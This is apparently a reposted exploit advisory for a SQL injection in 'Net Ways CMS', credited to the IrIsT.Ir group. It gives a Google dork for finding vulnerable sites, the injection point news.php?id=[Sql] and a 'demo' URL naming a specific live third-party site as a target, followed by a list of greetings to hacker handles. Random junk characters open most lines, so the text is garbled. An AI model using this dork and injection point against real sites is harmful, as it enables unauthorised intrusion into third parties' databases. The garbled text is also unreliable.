Net Ways CMS SQL Injection

admin

################################################################################??########  
#  
3 C' t0 M: r7 t( H) }1 K# Exploit Title : Net Ways Cms Sql Injection Vulnerability  
#  
6 Y- W8 g: Q% R# P- R7 m# Author        : IrIsT.Ir  
- S9 ]. j/ `. X) N2 x#  
' z; s" s+ J9 R# |# Discovered By : Am!r  
7 z& i! a: U. G#  
. U+ U) ?/ Q6 ]- O# Home          : http://IrIsT.Ir/forum  
#  
# Software Link : http://www.netways.com/   www.political-security.com
- E& y  Y( E2 v& F& T#  
# Security Risk : High  
& f1 [$ S" y1 J7 f% E% k+ F#  
# Version       : All Version  
. E: W- Y# W( x9 ~  x* ^0 o7 Z+ T#  
; `: G( M; H9 N( e# [# Tested on     : GNU/Linux Ubuntu - Windows Server - win7  
: M- O) n4 w( p#  
+ d* p  v- x6 Y7 d# Dork          : intext:"Designed & developed by NetWays"  
#  
################################################################################??########  
+ ?- V' b+ E. ^' r! g#  
#  Expl0iTs :  
+ b' Z4 D; a' t5 }) [) Y7 z#  
0 c' [2 B0 P3 J8 \7 D  x#  http://target.com/news.php?id=[Sql]  
+ a% z7 l' V4 p9 U5 }#  
$ ]5 V2 [7 m6 g9 O#  
5 |" G- x4 B, N, f# D3mo :  
#  
1 a# F9 ]9 K- Q, N4 J# http://compagnieparento.com/news.php?id=7[Sql]  
/ p7 G. i& K* Y0 J4 w$ {9 H#  
################################################################################??########  
+ m8 M8 Z6 a: z  ^, J#  
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r   
#  
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r   
#  
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum  
#  
################################################################################??########